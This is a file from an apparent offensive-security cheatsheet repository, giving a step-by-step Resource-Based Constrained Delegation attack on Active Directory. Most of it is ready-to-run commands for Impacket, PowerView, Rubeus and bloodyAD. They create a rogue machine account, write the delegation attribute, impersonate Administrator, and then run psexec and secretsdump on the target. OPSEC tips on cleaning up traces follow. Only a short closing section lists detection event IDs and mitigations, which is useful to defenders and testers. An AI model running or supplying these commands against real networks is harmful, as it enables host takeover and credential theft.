daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-17-resource-based-constrained-delegation-rbcd.md (10540B)


      1 ---
      2 title: "Attack #17 β€” Resource-Based Constrained Delegation (RBCD)"
      3 description: "Resource-Based Constrained Delegation (RBCD) flips traditional Constrained Delegation on its head. Instead of the delegating account specifying which…"
      4 category: active-directory
      5 subcategory: "Kerberos & Delegation"
      6 tags: ["active-directory", "delegation"]
      7 tools: ["NetExec", "Impacket", "Rubeus", "BloodHound", "ldapsearch"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Two/🟠 Attack #17 β€” Resource-Based Constrained Delegation (RBCD).md"
     11 ---
     12 # 🟠 Attack #17 β€” Resource-Based Constrained Delegation (RBCD)
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 Resource-Based Constrained Delegation (RBCD) flips traditional Constrained Delegation on its head. Instead of the **delegating account** specifying which services it can delegate to (via `msDS-AllowedToDelegateTo`), the **target resource** specifies which accounts are allowed to delegate to it (via `msDS-AllowedToActOnBehalfOfOtherIdentity`). This means anyone who can **write to a computer object's attributes** can configure RBCD on it β€” allowing a controlled account to impersonate any user to that computer.
     19 
     20 ### Why RBCD is So Dangerous
     21 
     22 1. **No Domain Admin required to configure** β€” only GenericWrite/GenericAll on the target computer
     23 2. **MachineAccountQuota** allows any domain user to create up to 10 computer accounts by default
     24 3. **Combining write permissions + machine account creation = full compromise of the target host**
     25 
     26 ### The Full Attack Flow
     27 
     28 ```
     29 1. Identify a computer object where you have write permissions (GenericWrite/GenericAll)
     30 2. Create a machine account you control (or use an existing one)
     31 3. Set msDS-AllowedToActOnBehalfOfOtherIdentity on the TARGET computer
     32    to trust your machine account
     33 4. Use S4U2Self + S4U2Proxy from your machine account to impersonate
     34    Administrator to the target computer
     35 5. Access the target as Administrator (CIFS, HOST, LDAP, etc.)
     36 ```
     37 
     38 ***
     39 
     40 ## βš™οΈ Prerequisites
     41 
     42 | Requirement | Detail |
     43 |---|---|
     44 | **Write permissions on target computer** | GenericWrite, GenericAll, WriteDACL, or specific write to `msDS-AllowedToActOnBehalfOfOtherIdentity` |
     45 | **Controlled machine account** | Create via MachineAccountQuota (default 10) or use existing compromised computer |
     46 | **Domain user account** | To create machine account and configure RBCD |
     47 
     48 ***
     49 
     50 ## πŸ› οΈ Tools
     51 
     52 | Tool | Platform | Notes |
     53 |---|---|---|
     54 | **Impacket β€” rbcd.py** | Linux | Configure RBCD delegation |
     55 | **Impacket β€” addcomputer.py** | Linux | Create machine accounts |
     56 | **Impacket β€” getST.py** | Linux | S4U2Self + S4U2Proxy exploitation |
     57 | **Rubeus** | Windows | S4U attack after RBCD configuration |
     58 | **PowerView** | Windows | Write RBCD attribute on target |
     59 | **StandIn** | Windows | .NET tool for RBCD manipulation |
     60 | **bloodyAD** | Linux | All-in-one RBCD exploitation |
     61 
     62 ***
     63 
     64 ## πŸ’» Full Commands
     65 
     66 ### πŸ”΅ Step 1 β€” Find Writable Computer Objects
     67 
     68 ```powershell
     69 # ── PowerView β€” find computers where you have write access ────────────────────
     70 Find-InterestingDomainAcl -ResolveGUIDs | 
     71   Where-Object { $_.ActiveDirectoryRights -match "GenericWrite|GenericAll|WriteDACL" -and 
     72     $_.ObjectClass -eq "computer" }
     73 
     74 # ── BloodHound Cypher query ───────────────────────────────────────────────────
     75 # MATCH p=(u:User {name:'LOW_USER@CORP.LOCAL'})-[r:GenericWrite|GenericAll]->(c:Computer) RETURN p
     76 ```
     77 
     78 ```bash
     79 # ── BloodHound.py β€” collect and analyze ───────────────────────────────────────
     80 bloodhound-python -u low_user -p 'Password1' -d corp.local -ns 10.10.10.10 -c All --zip
     81 # Upload to BloodHound β†’ "Find Shortest Paths to Domain Admins"
     82 ```
     83 
     84 ### πŸ”΄ Step 2 β€” Create Machine Account
     85 
     86 ```bash
     87 # ── Impacket β€” create machine account ─────────────────────────────────────────
     88 addcomputer.py -computer-name 'FAKEMACHINE$' -computer-pass 'FakePass123!' \
     89   -dc-ip 10.10.10.10 corp.local/low_user:'Password1'
     90 
     91 # ── Check MachineAccountQuota (default = 10) ──────────────────────────────────
     92 nxc ldap DC01.corp.local -u low_user -p 'Password1' -M maq
     93 # Or:
     94 ldapsearch -x -H ldap://DC01.corp.local -D "low_user@corp.local" -w 'Password1' \
     95   -b "DC=corp,DC=local" "(objectClass=domain)" ms-DS-MachineAccountQuota
     96 ```
     97 
     98 ```powershell
     99 # ── PowerShell β€” create machine account ───────────────────────────────────────
    100 Import-Module .\\Powermad.ps1
    101 New-MachineAccount -MachineAccount FAKEMACHINE -Password $(
    102   ConvertTo-SecureString 'FakePass123!' -AsPlainText -Force
    103 )
    104 ```
    105 
    106 ### πŸ”΄ Step 3 β€” Configure RBCD on Target
    107 
    108 ```bash
    109 # ── Impacket β€” rbcd.py ────────────────────────────────────────────────────────
    110 rbcd.py -delegate-from 'FAKEMACHINE$' -delegate-to 'TARGET$' \
    111   -action write -dc-ip 10.10.10.10 corp.local/low_user:'Password1'
    112 
    113 # ── Verify ────────────────────────────────────────────────────────────────────
    114 rbcd.py -delegate-to 'TARGET$' -action read \
    115   -dc-ip 10.10.10.10 corp.local/low_user:'Password1'
    116 
    117 # ── bloodyAD ──────────────────────────────────────────────────────────────────
    118 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \
    119   add rbcd 'TARGET$' 'FAKEMACHINE$'
    120 ```
    121 
    122 ```powershell
    123 # ── PowerShell / PowerView ────────────────────────────────────────────────────
    124 $ComputerSid = Get-DomainComputer FAKEMACHINE -Properties objectsid | Select -Expand objectsid
    125 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
    126 $SDBytes = New-Object byte[] ($SD.BinaryLength)
    127 $SD.GetBinaryForm($SDBytes, 0)
    128 Set-DomainObject -Identity TARGET$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
    129 
    130 # ── StandIn ───────────────────────────────────────────────────────────────────
    131 .\StandIn.exe --computer TARGET --sid <FAKEMACHINE_SID>
    132 ```
    133 
    134 ### πŸ”΄ Step 4 β€” S4U Attack β†’ Impersonate Administrator
    135 
    136 ```bash
    137 # ── getST.py β€” S4U2Self + S4U2Proxy ──────────────────────────────────────────
    138 getST.py -spn cifs/TARGET.corp.local \
    139   -impersonate Administrator \
    140   -dc-ip 10.10.10.10 \
    141   corp.local/'FAKEMACHINE$':'FakePass123!'
    142 
    143 # ── Use the ticket ────────────────────────────────────────────────────────────
    144 export KRB5CCNAME=Administrator@cifs_TARGET.corp.local@CORP.LOCAL.ccache
    145 
    146 psexec.py -k -no-pass corp.local/Administrator@TARGET.corp.local
    147 wmiexec.py -k -no-pass corp.local/Administrator@TARGET.corp.local
    148 secretsdump.py -k -no-pass corp.local/Administrator@TARGET.corp.local
    149 smbclient.py -k -no-pass corp.local/Administrator@TARGET.corp.local
    150 ```
    151 
    152 ```powershell
    153 # ── Rubeus S4U ────────────────────────────────────────────────────────────────
    154 # First get FAKEMACHINE's hash:
    155 .\Rubeus.exe hash /password:FakePass123! /user:FAKEMACHINE$ /domain:corp.local
    156 # rc4_hmac: <hash>
    157 
    158 .\Rubeus.exe s4u \
    159   /user:FAKEMACHINE$ \
    160   /rc4:<FAKEMACHINE_HASH> \
    161   /impersonateuser:Administrator \
    162   /msdsspn:cifs/TARGET.corp.local \
    163   /ptt
    164 
    165 dir \\TARGET.corp.local\C$
    166 ```
    167 
    168 ### πŸ”΄ Step 5 β€” Cleanup
    169 
    170 ```bash
    171 # ── Remove RBCD configuration ────────────────────────────────────────────────
    172 rbcd.py -delegate-to 'TARGET$' -action flush \
    173   -dc-ip 10.10.10.10 corp.local/low_user:'Password1'
    174 
    175 # ── Delete machine account (if desired) ───────────────────────────────────────
    176 addcomputer.py -computer-name 'FAKEMACHINE$' -computer-pass 'FakePass123!' \
    177   -dc-ip 10.10.10.10 corp.local/low_user:'Password1' -delete
    178 ```
    179 
    180 ***
    181 
    182 ## 🎯 OPSEC Tips
    183 
    184 - **RBCD is the most commonly exploited delegation type** β€” no DA required, just GenericWrite on a computer
    185 - **MachineAccountQuota = 10 by default** β€” almost always available for machine account creation
    186 - **Cleanup is critical** β€” remove the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute and delete the machine account after exploitation
    187 - **Protected Users group blocks delegation** β€” if Administrator is in Protected Users, impersonation will fail; target a different DA
    188 
    189 ***
    190 
    191 ## πŸ›‘οΈ Detection β€” Event IDs
    192 
    193 | Event ID | Source | What to Look For |
    194 |---|---|---|
    195 | **5136** | Security Log (DC) | Modification of `msDS-AllowedToActOnBehalfOfOtherIdentity` |
    196 | **4741** | Security Log (DC) | Computer account creation (MachineAccountQuota abuse) |
    197 | **4769** | Security Log (DC) | S4U2Proxy TGS request |
    198 | **4624** | Security Log | Network logon as impersonated user on target |
    199 
    200 ***
    201 
    202 ## πŸ”— Attack Chain Context
    203 
    204 ```
    205 [RBCD] ──→ Compromise Any Computer You Can Write To
    206          β”‚
    207          β”œβ”€β”€β†’ πŸ”‘ GenericWrite on Computer β†’ RBCD β†’ impersonate DA β†’ own that host
    208          β”œβ”€β”€β†’ πŸ’» GenericAll (#19) β†’ RBCD is one of the exploitation methods
    209          β”œβ”€β”€β†’ 🏭 MAQ (#47) β†’ create controlled machine accounts for RBCD
    210          β”œβ”€β”€β†’ πŸ”— Chain: ACL abuse β†’ RBCD β†’ DCSync (if target is DC)
    211          └──→ πŸ’€ Defeated by: set MAQ=0, monitor 5136, Protected Users group
    212 ```
    213 
    214 ***
    215 
    216 > βœ… **Attack #17 β€” RBCD complete.**